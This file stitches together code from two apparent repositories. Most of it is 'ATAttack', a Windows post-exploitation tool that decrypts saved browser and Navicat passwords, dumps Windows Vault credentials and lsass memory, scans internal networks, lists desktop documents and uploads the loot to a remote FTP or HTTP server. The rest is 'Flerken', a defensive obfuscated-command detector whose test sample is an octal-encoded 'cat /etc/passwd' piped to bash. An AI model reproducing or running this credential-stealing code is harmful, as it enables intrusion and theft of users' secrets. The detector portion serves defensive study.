class ThreadUrl(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
host = self.queue.get()
cmd = 'ping -n 2 -w 5 {}'.format(
host,)
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
result = p.stdout.read().decode('cp936').encode('utf-8').strip()
if "TTL=" in result:
ipadder = host.split('.')[0] + '.' + host.split('.')[1] + '.' + host.split('.')[2] + ".1/24"
adder.append(ipadder)
self.queue.task_done()
def ipfind(cidr):
for i in range(100):
t = ThreadUrl(queue)
t.setDaemon(True)
t.start()
for host in cidr:
queue.put(host)
queue.join()
return adder
--- FILE SEPARATOR ---
import os
import json
def powershell(cmd):
arg = r"powershell.exe " + cmd
powershell_ = os.popen(arg).read()
num = powershell_.decode('gbk')
write = num.split('\r\n')
return write
def regedit():
list_ = []
version = [
r'HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\\',
r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\']
for os in version:
query = r"$RegPath = 'Registry::{}\\';".format(os)+ '$QueryPath = dir $RegPath -Name;' \
+ 'foreach($Name in $QueryPath)' + '{(Get-ItemProperty -Path $RegPath$Name).DisplayName}'
list_.append(powershell(query))
return json.dumps(list_, encoding="UTF-8", ensure_ascii=False)
--- FILE SEPARATOR ---
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
import win32api
import win32con
from ATAttack.utility.decrypt import *
from ATAttack.framework.constant import constant
from ATAttack.enumeration.uninstall import regedit
command_list = []
class Software:
def __init__(self,_server):
self._server = _server
print '[*] Running history finder'
def getpatch(self, llsit):
return list(set(llsit))
def get_chrome_history(self):
try:
history_db = os.path.join(
constant.profile['LOCALAPPDATA'],u'Google\Chrome\\User Data\Default\history')
c = sqlite3.connect(history_db)
cursor = c.cursor()
select_statement = "SELECT urls.url FROM urls;"
cursor.execute(select_statement)
results = cursor.fetchall()
for i in results:
command_list.append(i[1])
c.close()
return command_list
except Exception:
return False
def get_ie_history(self):
reg_root = win32con.HKEY_CURRENT_USER
reg_path = r"Software\\Microsoft\\Internet Explorer\\typedURLs"
reg_flags = win32con.WRITE_OWNER | win32con.KEY_WOW64_64KEY | win32con.KEY_ALL_ACCESS
try:
key = win32api.RegOpenKeyEx(reg_root, reg_path, 0, reg_flags)
i = 0
while True:
url = (win32api.RegEnumValue(key, i))
command_list.append(url[1])
i += 1
win32api.RegCloseKey(key)
except Exception:
pass
return command_list
def get_Firefox_history(self):
data_path = os.path.join(
constant.profile['APPDATA'],u'Mozilla\\Firefox\\Profiles\\')
fs = os.listdir(data_path)
dict = []
for f1 in fs:
tmp_path = os.path.join(data_path, f1)
if os.path.isdir(tmp_path):
dict.append(tmp_path + r'\places.sqlite')
for ct in dict:
conn = sqlite3.connect(ct)
c = conn.cursor()
c.execute('select id, url, title from moz_places')
results = c.fetchall()
for i in results:
command_list.append(i[1])
c.close()
return command_list
def get_360c_history(self):
try:
history_db = os.path.join(
constant.profile['LOCALAPPDATA'],u'360Chrome\\Chrome\\User Data\\Default\\history')
if os.path.exists(history_db):
c = sqlite3.connect(history_db)
cursor = c.cursor()
select_statement = "SELECT urls.url FROM urls;"
cursor.execute(select_statement)
results = cursor.fetchall()
for i in results:
command_list.append(i[1])
c.close()
return list(set(command_list))
except Exception:
return False
def run(self):
Installation = regedit()
output = decypt()
print '[*] Finding histroy in ie'
self.get_ie_history()
output.ie_decrypt()
# output.decrypt_using_netsh()
if re.findall("Google+", Installation, re.S):
print '[*] Finding histroy in Chrome'
self.get_chrome_history()
output.get_decypt_chrome()
else:
pass
if re.findall("Mozilla+", Installation, re.S):
print '[*] Finding histroy in Firefox'
self.get_Firefox_history()
output.send_firefox_data()
else:
pass
self.get_360c_history()
output.get_decypt_360chrome()
try:
if re.findall('Navicat+', Installation, re.S):
print "[*] Attempting to decrypt Navicat"
for i, j in constant.regs.items():
try:
output.get_info(j)
except:
continue
except Exception:
pass
# print_warning("Please wait while uploading ... ")
log_tmp = list(set(command_list))
for history in log_tmp:
with open(constant.tmp_name, "a") as file:
file.writelines(history + '\r\n')
file.close()
return log_tmp
--- FILE SEPARATOR ---
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
import sqlite3
import win32crypt
import configparser
import shutil
import re
import win32cred
import random,string
import os
from ATAttack.framework.constant import constant
import subprocess
import _subprocess as sub
import tempfile
from winreg import OpenKey, HKEY_CURRENT_USER, EnumKey, EnumValue,CloseKey
tmp = tempfile.gettempdir()
class decypt():
def __init__(self):
self.database_query = 'SELECT action_url, username_value, password_value FROM logins'
def str_rangdom(self):
return ''.join(random.sample(string.ascii_letters + string.digits,8))
def copy_db(self,db_path,database_path):
try:
if os.path.isfile(db_path):
shutil.copy(db_path, database_path)
return database_path
except Exception:
pass
def clean_file(self, db_path):
try:
os.popen('RD /S /Q ' + db_path)
except Exception:
return False
def get_decypt_chrome(self):
db_path = os.path.join(
constant.profile['LOCALAPPDATA'],u'Google\Chrome\\User Data\Default\Login Data')
databases = self.copy_db(db_path,tmp + os.sep + self.str_rangdom())
try:
conn = sqlite3.connect(databases)
cursor = conn.cursor()
cursor.execute(self.database_query)
for url, login, password in cursor.fetchall():
password = win32crypt.CryptUnprotectData(password, None, None, None, 0)
if password:
print "Chrome browser decryption result: "
print 'Title: ' + url
print 'Username: ' + login
print 'Password: ' + password
except Exception:
return False
finally:
conn.close()
os.remove(databases)
def get_decypt_360chrome(self):
file_path = os.path.join(
constant.profile['LOCALAPPDATA'],r'360Chrome\Chrome\User Data\Default\Login Data')
if os.path.exists(file_path):
databases = self.copy_db(file_path,tmp + os.sep + self.str_rangdom())
try:
conn = sqlite3.connect(databases)
cursor = conn.cursor()
print '[*] Finding histroy in 360Chrome'
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(
result[2], None, None, None, 0)[1]
if password:
print "360 browser decryption result: "
print 'Title: ' + result[0]
print 'Username: ' + result[1]
print 'Password: ' + password
conn.close()
os.remove(databases)
except Exception :
pass
def get_firefox_profiles(self):
iniPath = os.path.join(constant.profile['APPDATA'],
r'Mozilla\Firefox\profiles.ini')
config = configparser.ConfigParser()
config.read(iniPath)
return os.path.join(
constant.profile['APPDATA'],r'Mozilla\Firefox',config['Profile0']['Path'] + '\\') .replace("/", "\\")
def send_firefox_data(self):
key = ['key4.db', 'key3.db', 'logins.json']
for db in key:
filename = self.get_firefox_profiles() + db
if os.path.isfile(filename):
shutil.copy(filename, constant.upload_dir)
def ie_decrypt(self):
try:
cmdline = '''
try
{
#Load the WinRT projection for the PasswordVault
$Script:vaultType = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$Script:vault = new-object Windows.Security.Credentials.PasswordVault -ErrorAction silentlycontinue
}
catch
{
throw "This module relies on functionality provided in Windows 8 or Windows 2012 and above."
}
#endregion
function Get-VaultCredential
{
process
{
try
{
&{
$Script:vault.RetrieveAll()
} | foreach-Object { $_.RetrievePassword() ; "Username......";$_.UserName;"######";"Password......";$_.Password;"######";"Website......";$_.Resource;"_________" }
}
catch
{
Write-Error -ErrorRecord $_ -RecommendedAction "Check your search input - user: $UserName resource: $Resource"
}
}
end
{
Write-Debug "[$cmdName] Exiting function"
}
}
Get-VaultCredential
'''
command = ['powershell.exe', '/c', cmdline]
info = subprocess.STARTUPINFO()
info.dwFlags = sub.STARTF_USESHOWWINDOW | sub.CREATE_NEW_PROCESS_GROUP
info.wShowWindow = sub.SW_HIDE
p = subprocess.Popen(command, startupinfo=info, stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
results, _ = p.communicate()
passwords = []
for result in results.replace('\n', '').split('_________'):
values = {}
if result:
for res in result.split('######'):
values[res.split('......')[0]] = res.split('......')[1]
passwords.append(values)
print "Get common credentials for windows vault :" + "\n" + str(passwords)
CRED_TYPE_GENERIC = win32cred.CRED_TYPE_GENERIC
CredRead = win32cred.CredRead
creds = win32cred.CredEnumerate(None, 0) # Enumerate credentials
credentials = []
for package in creds:
try:
target = package['TargetName']
creds = CredRead(target, CRED_TYPE_GENERIC)
credentials.append(creds)
except Exception:
pass
values_ = {}
for cred in credentials:
values_['service'] = cred['TargetName']
values_['UserName'] = cred['UserName']
values_['pwd'] = cred['CredentialBlob'].decode('utf16')
print "Get windows vault web credentials :" + "\n" + str(values_)
except Exception:
pass
def get_info(self,reg):
key = OpenKey(HKEY_CURRENT_USER, reg)
conns = []
try:
i = 0
while 1:
name = EnumKey(key, i)
conns.append(name)
i += 1
except:
pass
hosts = []
usernames = []
passwords = []
for i in conns:
key = OpenKey(HKEY_CURRENT_USER, reg + '\\' + i)
try:
j = 0
while 1:
name, value, type = EnumValue(key, j)
if name == 'Host':
hosts.append(value)
if name == 'UserName':
usernames.append(value)
if name == 'Pwd':
passwords.append(value)
j += 1
except:
pass
CloseKey(key)
for i in range(len(hosts)):
if len(hosts[i]) is not 0:
print 'host_name:' + hosts[i] + ' ' + 'username:' + usernames[i] + ' ' + 'password:' + passwords[i]
--- FILE SEPARATOR ---
#! /usr/bin/env python2.7
# -*- coding:UTF-8 -*-
import fnmatch
import sys
from ATAttack.utility.browser import *
from ATAttack.enumeration.host import ipfind
from ATAttack.credentials.check import ipadders, smb_version
from ATAttack.framework.prints import *
from ATAttack.utility.browser import Software
from ATAttack.enumeration.tasklist import disk
from ATAttack.enumeration.tasklist import tasklist,token
from ATAttack.enumeration.connect import login_
from ATAttack.framework.constant import constant
from ATAttack.enumeration.upload import upload
from ATAttack.credentials.dump import samdump
import argparse
ipadder_list = []
tmp = os.mkdir(constant.upload_dir)
reload(sys)
sys.setdefaultencoding("utf-8")
class Credentials:
def __init__(self, host, username, password):
self.host = host
self.username = username
self.password = password
if self.username is None:
self.username = 'anonymous'
class exploit:
def __init__(self, list,_server):
self.list = list
self.ftp = _server
def cmd(self, list):
self.browers_history()
for i in list:
ret = os.popen(i).read()
ipadder_list.append(ret.decode('cp936').encode('utf-8').strip())
ip = re.findall(
r'1(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])',
str(ipadder_list),
re.S)
iplist = []
for ipaddr in ip:
ipadder = ipaddr.split(
'.')[0] + '.' + ipaddr.split('.')[1] + '.' + ipaddr.split('.')[2]
iplist.append(ipadder)
return iplist
def pings(self):
list = []
ipadder = (set(self.cmd(constant.cmdlist)))
aparagraph = [x + ".1" for x in ipadder]
bparagraph = [x + ".254" for x in ipadder]
aparagraph.extend(bparagraph)
for add in aparagraph:
if ipadders().is_internal_ip(add):
list.append(add)
print_info("{} were obtained through information collection".format(
str(len(list))))
regex = set(ipfind(list))
return regex
def ipcidr(self):
dump = samdump().save_hives()
# dump = "fc66399dae9416d8455605b8498ea328"
print_success(
"Successful acquisition of administrator ntlmhash :{}".format(dump))
print_warning(
"Attempting to export the lsass.exe process")
tasklist = os.popen('tasklist /svc | findstr lsass.exe').read()
regex = re.findall(r'\d+', tasklist, re.S)
payload = r'powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump {} {} full"'.format(
regex[0], constant.dump_name)
os.system(payload)
for network in self.pings():
print_warning("Discovered that the segment network is reachable :" + network )
smb_version(network, dump)
def browers_history(self,):
Software_ = Software(self.ftp)
for url in Software_.run():
import urlparse
url_change = urlparse.urlparse(url)
host = url_change.netloc
ipadder_list.append(host)
class information():
@staticmethod
def run():
if len(disk()) == 1:
exit()
print_success('Existing in the current process' + tasklist())
login_().rdplogin_()
print_success("Delegation tokens Available" + "\n" + str(token()))
dir = os.path.join(os.path.expanduser("~"), 'Desktop') + '\\'
print_warning('Attempting to obtain system sensitive files')
file = ['*.pdf', '*.doc', '*.docx', '*.ppt', '*.pptx', "*.xlsx", "*.rtf", "*.csv",'*.txt']
f = open(constant.tmp_name_, 'w')
for root, dirs, files in os.walk(dir):
for name in files:
for file_ in file:
if fnmatch.fnmatch(name, file_):
f.write(os.path.join(root, name))
f.write('\n')
f.close()
class _start():
@staticmethod
def run(_server):
print_warning('temporary Storage Folder :' + constant.upload_dir)
ia = information()
ia.run()
ig = exploit(constant.cmdlist,_server)
ig.ipcidr()
def clean(self):
try:
os.system("rd /s/q" + " " + constant.upload_dir)
except Exception:
pass
if __name__ == '__main__':
parse = argparse.ArgumentParser(description="ATAttack")
parse.add_argument('-t', '--host', type=str, help="host")
parse.add_argument('-u', '--username', type=str, help="username")
parse.add_argument('-p', '--password', type=str, help="password",)
parse.add_argument('-d', '--domain', type=str, help="upload",)
args = parse.parse_args()
host = args.host
domain = args.domain
username = args.username
password = args.password
server = None
if not args.domain:
_start().run(server)
if args.domain:
_start().run(server)
_server = upload(credentials='')
filename = _server.encrypt(constant.upload_dir)
_server.HTTPupload(domain,filename)
_start().clean()
try:
if args.host:
print_warning("Attempt to connect to FTP server :" + host)
credentials = Credentials(host, username, password)
_server = upload(credentials)
_start().run(_server)
print_warning("Please wait while uploading ... ")
if os.path.getsize(constant.dump_name) == 0:
_server.lsass_dump()
_server.ftp_upload(_server.encrypt(constant.upload_dir))
except Exception:
pass
finally:
_start().clean()
|
[
"/ATAttack/credentials/dump.py",
"/ATAttack/enumeration/host.py",
"/ATAttack/enumeration/uninstall.py",
"/ATAttack/utility/browser.py",
"/ATAttack/utility/decrypt.py",
"/exploit.py"
] |
02bx/Flerken
|
#!/usr/bin/python
# -*-coding:utf-8-*-
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import sys
import os
sys.path.append('../flerken/control')
from smart_detect import smart_detect
LINUX_SAMPLE_PATH = 'samples/linux.txt'
WIN_SAMPLE_PATH = 'samples/win.txt'
OUTPUT_PATH = 'output'
def win_sample_test():
    """Run the smart detector over every Windows sample and report coverage.

    Writes one classification line per command to output/win_res.txt and
    prints the percentage of samples detected as windows-obfuscated.
    Fixes: `== True` comparisons replaced by truthiness; guarded against
    ZeroDivisionError on an empty sample file; percentage computed as
    round(x*100, 3) instead of round(x, 5)*100, which reintroduced binary
    float artifacts in the printed value.
    """
    total = 0
    obfus = 0
    with open(os.path.join(OUTPUT_PATH,'win_res.txt'),'w') as fo:
        #read sample file, one command per line
        with open(WIN_SAMPLE_PATH) as fs:
            for cmd in fs.readlines():
                total = total + 1
                smart = smart_detect(cmd)
                res = smart.not_sure_identify()
                # NOTE: cmd keeps its trailing newline, so entries in the
                # result file are separated by a blank line.
                if res['obfuscated'] and res['likely_platform'] == 'windows':
                    obfus = obfus + 1
                    fo.write('[windows obfuscated]: '+cmd+'\n')
                elif res['obfuscated'] and res['likely_platform'] == 'linux':
                    fo.write('[wrong platform detected]: '+cmd+'\n')
                else:
                    fo.write('[not obfuscated detected]: '+cmd+'\n')
    if total == 0:
        print("windows coverage rate is 0% (no samples)")
    else:
        print("windows coverage rate is "+str(round((obfus/total)*100, 3))+'%')
def linux_sample_test():
    """Classify every Linux sample command and report detector coverage.

    Reads one command per line from LINUX_SAMPLE_PATH, runs smart_detect on
    each, writes a per-command verdict to output/linux_res.txt, and prints
    the percentage of samples flagged as obfuscated Linux commands.
    """
    total = 0
    obfus = 0
    with open(os.path.join(OUTPUT_PATH,'linux_res.txt'),'w') as fo:
        #read sample file
        with open(LINUX_SAMPLE_PATH) as fs:
            for cmd in fs:
                total = total + 1
                smart = smart_detect(cmd)
                res = smart.not_sure_identify()
                # Lines read from the file keep their trailing newline;
                # strip it when writing so the report is not double-spaced.
                line = cmd.rstrip('\n')
                if res['obfuscated'] == True and res['likely_platform'] == 'linux':
                    obfus = obfus + 1
                    fo.write('[linux obfuscated]: '+line+'\n')
                elif res['obfuscated'] == True and res['likely_platform'] == 'windows':
                    fo.write('[wrong platform detected]: '+line+'\n')
                else:
                    fo.write('[not obfuscated detected]: '+line+'\n')
    if total == 0:
        # Guard: an empty sample file previously raised ZeroDivisionError.
        print("linux coverage rate is 0%")
        return
    # Round AFTER scaling to a percentage; round(x, 5)*100 reintroduced
    # floating-point noise into the printed value.
    print("linux coverage rate is "+str(round(obfus/total*100, 3))+'%')
if '__main__' == __name__:
    # CLI entry point: print the banner, then run both sample suites.
    print('''
 ________________ ______
___ ____/___ /_____ ___________ /_______ _______
__ /_ __ / _ _ \__ ___/__ //_/_ _ \__ __ \\
_ __/ _ / / __/_ / _ ,< / __/_ / / /
/_/ /_/ \___/ /_/ /_/|_| \___/ /_/ /_/
Flerken Coverage Test Tool, All Your Obfuscations Are Belong To Us!
''')
    print("[+]Checking windows samples, please waiting...")
    win_sample_test()
    print("[+]Checking linux samples, please waiting...")
    linux_sample_test()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Init Flerken App
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flask import Flask
from flask_wtf.csrf import CSRFProtect
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from .config.global_config import APP_CONFIG
import logging
# Create the Flask application and enable CSRF protection on all forms.
app = Flask(__name__)
CSRFProtect(app)
app.debug = APP_CONFIG['DEBUG']
app.secret_key = APP_CONFIG['SECRET_KEY']
# Optional request rate limiting, keyed on the client's remote address.
if APP_CONFIG['QPS_LIMIT'] == True:
    limiter = Limiter(
        app,
        key_func=get_remote_address,
        default_limits=APP_CONFIG['LIMIT_SETTING'],
    )
# log file config
handler = logging.FileHandler(APP_CONFIG['LOG_FILE'], encoding='UTF-8')
logging_format = logging.Formatter(
    '%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(logging_format)
app.logger.addHandler(handler)
# Imported for their side effects: these modules register the app's routes.
import flerken.landing
import flerken.detection
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
config
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
# Web application settings consumed by the Flask app factory.
APP_CONFIG = {
    "HOST": "127.0.0.1",
    "PORT": 8081,
    "DEBUG": True, #debug mode
    # NOTE(review): hard-coded secret key — should be loaded from the
    # environment or a secrets store before any public deployment.
    "SECRET_KEY": "awesomeflerken*",
    "QPS_LIMIT": True,
    # Rate limits applied when QPS_LIMIT is enabled (flask-limiter syntax).
    "LIMIT_SETTING": ["200 per minute", "5 per second"],
    "LOG_FILE": "flerken.log"
}
# MySQL connection settings, keyed by connection index.
DB_CONFIG = {
    0: {
        "host": "127.0.0.1",
        "port": "3306",
        "user": "root",
        "password": "",
        "database": "flerken",
        'charset': 'utf8',
        'DB_DEBUG': True, # Please set this field to 'False' when your website going online
        'autocommit': True
    }
}
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/custom_meta_chars_plugin.py
"""
This module filters unexpected chars in command
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class custom_meta_chars_plugin(object):
    """Strip characters matched by the configured 'meta_chars' regex from a command.

    The cleaned command is computed at construction time and exposed as
    ``self.result``.
    """
    def __init__(self, cmd):
        self.cmd = cmd
        self.rules = self._load_rules()
        self.result = self._check()
    def _load_rules(self):
        """Load the meta-chars rule file; fall back to the parent-relative path.

        The fallback covers being started from a subdirectory (e.g. tests/).
        """
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/rules/meta_chars.json')) as f:
                return json.load(f)
        except Exception:
            with open(os.path.join(os.getcwd(),'../flerken/config/rules/meta_chars.json')) as f:
                return json.load(f)
    def _check(self):
        """Return self.cmd with every character matching 'meta_chars' removed."""
        pattern_valid = re.compile(self.rules['meta_chars'])
        return pattern_valid.sub("", self.cmd)
if __name__ == '__main__':
    # Quick manual smoke test: show the filtered form of two noisy commands.
    samples = (
        'ddd121323213*&^&%$$")({}[]',
        'vcvddd12132fgfdgfdgfd3213*&^&%$$")3(e3wqre{rrewr}[]',
    )
    for sample in samples:
        print('input cmd: ' + sample)
        filtered = custom_meta_chars_plugin(sample).result
        print('out: ' + str(filtered))
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_generic_detect_plugin.py
"""
This module detects linux generic obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import warnings
import re
import os,sys
import json
from .linux_generic_filter_plugin import linux_generic_filter_plugin
class linux_generic_detect_plugin(object):
    """Detect generic Linux command obfuscation via rule sets in linux_rule.json.

    The verdict is computed at construction time and exposed as
    ``self.result`` ({"obfuscated": bool, "reason": str}).
    """
    def __init__(self, cmd):
        self.cmd = cmd
        #OBFUSCATED TYPE STORAGE: names of every rule category that matched.
        self.__TYPE_LIST = []
        self.result = self._detect_obfuscation()
    def _load_generic_rules(self, rule_type):
        """Load the 'generic' rule group *rule_type*; fall back to the parent-relative path."""
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/rules/linux_rule.json')) as f:
                self.rules = json.load(f)['generic'][rule_type]
                return self.rules
        except Exception:
            # Running from a subdirectory (e.g. tests/): retry one level up.
            with open(os.path.join(os.getcwd(),'../flerken/config/rules/linux_rule.json')) as f:
                self.rules = json.load(f)['generic'][rule_type]
                return self.rules
    def _prepare_pattern(self, regex):
        """Compile *regex*; on error warn and return a never-matching pattern."""
        try:
            return re.compile(regex)
        except re.error as e:
            warnings.warn(
                "Caught '{error}' compiling regex: {regex}"
                .format(error=e, regex=regex)
            )
            return re.compile(r'(?!x)x')
    def _check(self, rule_type):
        """Append *rule_type* to the match list iff every rule in self.rules matches.

        Rules are evaluated in order; ``flag`` tracks the index of the last
        matching rule and any failure stops the scan, so the category is
        recorded only when the final rule (index len-1) matched.  A rule with
        a 'length' key additionally constrains len(self.cmd) by its
        'condition' operator; a rule with an unrecognized operator is skipped
        without breaking the scan (original behavior, preserved verbatim).
        """
        flag = -1
        for r in range(0,len(self.rules)):
            regex_compiled = self._prepare_pattern(self.rules[str(r)]['regex'])
            if 'length' in self.rules[str(r)].keys():
                if self.rules[str(r)]['condition'] == '<':
                    if regex_compiled.search(self.cmd) != None and len(self.cmd) < self.rules[str(r)]['length']:
                        flag = r
                        continue
                    else:
                        break
                if self.rules[str(r)]['condition'] == '>':
                    if regex_compiled.search(self.cmd) != None and len(self.cmd) > self.rules[str(r)]['length']:
                        flag = r
                        continue
                    else:
                        break
                if self.rules[str(r)]['condition'] == '<=':
                    if regex_compiled.search(self.cmd) != None and len(self.cmd) <= self.rules[str(r)]['length']:
                        flag = r
                        continue
                    else:
                        break
                if self.rules[str(r)]['condition'] == '>=':
                    if regex_compiled.search(self.cmd) != None and len(self.cmd) >= self.rules[str(r)]['length']:
                        flag = r
                        continue
                    else:
                        break
                if self.rules[str(r)]['condition'] == '=':
                    if regex_compiled.search(self.cmd) != None and len(self.cmd) == self.rules[str(r)]['length']:
                        flag = r
                        continue
                    else:
                        break
            else:
                if regex_compiled.search(self.cmd) != None:
                    flag = r
                    continue
                else:
                    break
        if flag == len(self.rules) -1:
            self.__TYPE_LIST.append(rule_type)
    def _varible_name_score(self):
        """Return 1 when at least two extracted variable-name substrings repeat, else 0."""
        score=0
        pattern = self._load_generic_rules('varible_name_score')["0"]['regex']
        try:
            pattern_str = re.compile(pattern)
            result_str = pattern_str.findall(self.cmd)
            result_str = list(set(result_str))
            for string_ele in result_str:
                if len(string_ele)>0:
                    # NOTE(review): string_ele is interpolated into the regex
                    # unescaped, so metacharacters in it alter the count —
                    # confirm whether re.escape() was intended.
                    pattern_repeat = re.compile(r'%s' %string_ele)
                    target_str = pattern_repeat.findall(self.cmd)
                    if len(target_str)>1:
                        score += 1
            # NOTE(review): the strict '> 1' requires TWO repeating names for
            # a positive score — confirm '>= 1' was not intended.
            if score > 1:
                score = 1
            else:
                score = 0
            return score
        except Exception as e:
            # BUGFIX: previously fell through returning None; callers compare
            # the result with `== 1`, so 0 preserves the outcome explicitly.
            print(e)
            return 0
    def _varible_name_check(self):
        """Record 'varible_name' when the variable-name heuristics all agree."""
        vn_rules = self._load_generic_rules('varible_name')
        vn_rules_compiled = dict()
        for rule in vn_rules:
            vn_rules_compiled[int(rule)] = self._prepare_pattern(vn_rules[rule]['regex'])
        if vn_rules_compiled[0].search(self.cmd) != None:
            if self._varible_name_score() == 1:
                if vn_rules_compiled[1].search(self.cmd) != None:
                    if linux_generic_filter_plugin(self.cmd,'varible_name').result == False:
                        if len(self.cmd) < 1000:
                            self.__TYPE_LIST.append('varible_name')
    def _detect_obfuscation(self):
        """Run every non-whitelisted rule category plus the variable-name check."""
        type_list = ["echo_type", "sub_syntax", "special_calc", "ifs", "offset_ctl", "escape_char", "reverse_char", "base64", "rot13_char", "octal_code", "hex_or_unicode", "wildcard"]
        for category in type_list:
            if linux_generic_filter_plugin(self.cmd,category).result == False:
                self._load_generic_rules(category)
                self._check(category)
        self._varible_name_check()
        if len(self.__TYPE_LIST) > 0:
            return {"obfuscated": True, "reason": "linux.obfus.generic"}
        else:
            return {"obfuscated": False, "reason": ""}
if __name__ == '__main__':
    #test
    # Manual smoke test: an octal-escaped `cat /etc/passwd` piped to bash.
    sample = "echo $'\\143\\141\\164\\040\\057\\145\\164\\143\\057\\160\\141\\163\\163\\167\\144' | bash"
    print('input cmd: '+sample)
    linux_generic_detect_plugin(sample)._detect_obfuscation()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_generic_filter_plugin.py
"""
This module filters linux generic obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class linux_generic_filter_plugin(object):
    """Whitelist filter for one generic Linux rule category.

    ``self.result`` is True when *cmd* matches any whitelist entry for
    *type*, i.e. the command is considered benign and the corresponding
    detector should skip it.
    """
    # Comparison operators allowed in a whitelist entry's 'condition' field.
    _CONDITIONS = {
        '<': lambda a, b: a < b,
        '>': lambda a, b: a > b,
        '<=': lambda a, b: a <= b,
        '>=': lambda a, b: a >= b,
        '=': lambda a, b: a == b,
    }
    def __init__(self,cmd, type):
        self.cmd = cmd
        self.type = type
        self.whitelists = self._load_generic_whitelists()
        self.result = self._check()
    def _load_generic_whitelists(self):
        """Load the 'generic' whitelist group for self.type; fall back to the parent-relative path."""
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/whitelists/linux_whitelist.json')) as f:
                return json.load(f)['generic'][self.type]
        except Exception:
            # Running from a subdirectory (e.g. tests/): retry one level up.
            with open(os.path.join(os.getcwd(),'../flerken/config/whitelists/linux_whitelist.json')) as f:
                return json.load(f)['generic'][self.type]
    def _prepare_pattern(self, regex):
        """Compile *regex*; on error warn and return a never-matching pattern."""
        try:
            return re.compile(regex)
        except re.error as e:
            # BUGFIX: this module never imported warnings at the top level,
            # so the original raised NameError whenever a rule regex was bad.
            import warnings
            warnings.warn(
                "Caught '{error}' compiling regex: {regex}"
                .format(error=e, regex=regex)
            )
            return re.compile(r'(?!x)x')
    def _check(self):
        """Return True iff any whitelist entry matches self.cmd.

        An entry with a 'length' key must additionally satisfy
        ``len(cmd) <condition> length``; entries with an unrecognized
        condition operator are skipped (matching the original behavior).
        The original duplicated the regex/length test for all five
        operators and had unreachable ``break`` statements after each
        ``return``; both are collapsed here.
        """
        for wl in range(0, len(self.whitelists)):
            entry = self.whitelists[str(wl)]
            regex_compiled = self._prepare_pattern(entry['regex'])
            if regex_compiled.search(self.cmd) is None:
                continue
            if 'length' in entry:
                compare = self._CONDITIONS.get(entry['condition'])
                if compare is not None and compare(len(self.cmd), entry['length']):
                    return True
            else:
                return True
        return False
if __name__ == '__main__':
    #test
    # Manual smoke test: '$(echo 3)' against the echo_type whitelist.
    sample = '$(echo 3)'
    print('input cmd: '+sample)
    print(linux_generic_filter_plugin(sample,"echo_type").result)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_graphic_detect_plugin.py
"""
This module detects linux graphic obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class linux_graphic_detect_plugin(object):
    """Detect 'graphic' obfuscation: commands drawn mostly from underscores.

    ``self.result`` is computed at construction time.
    """
    def __init__(self, cmd):
        self.cmd = cmd
        self.result = self._detect_obfuscation()
    def _load_graphic_rule(self):
        """Load the 'graphic' rule; fall back to the parent-relative path."""
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/rules/linux_rule.json')) as f:
                self.rule = json.load(f)['graphic']
                return self.rule
        except Exception:
            # Running from a subdirectory (e.g. tests/): retry one level up.
            with open(os.path.join(os.getcwd(),'../flerken/config/rules/linux_rule.json')) as f:
                self.rule = json.load(f)['graphic']
                return self.rule
    def _prepare_pattern(self, regex):
        """Compile *regex*; on error warn and return a never-matching pattern."""
        try:
            return re.compile(regex)
        except re.error as e:
            # BUGFIX: this module never imported warnings at the top level,
            # so the original raised NameError whenever the rule regex was bad.
            import warnings
            warnings.warn(
                "Caught '{error}' compiling regex: {regex}"
                .format(error=e, regex=regex)
            )
            return re.compile(r'(?!x)x')
    def _check(self):
        """Return True iff the graphic rule's regex matches self.cmd.

        BUGFIX: re.search() returns a Match object or None — never False —
        so the original ``search(...) == False`` test could never trigger
        and this method always returned True regardless of the regex.
        """
        self._load_graphic_rule()
        rule_compiled = self._prepare_pattern(self.rule['regex'])
        return rule_compiled.search(self.cmd) is not None
    def _underline_rate(self):
        """Return True when more than 60% of the command's characters are '_'."""
        underline_cnt = (self.cmd).count("_")
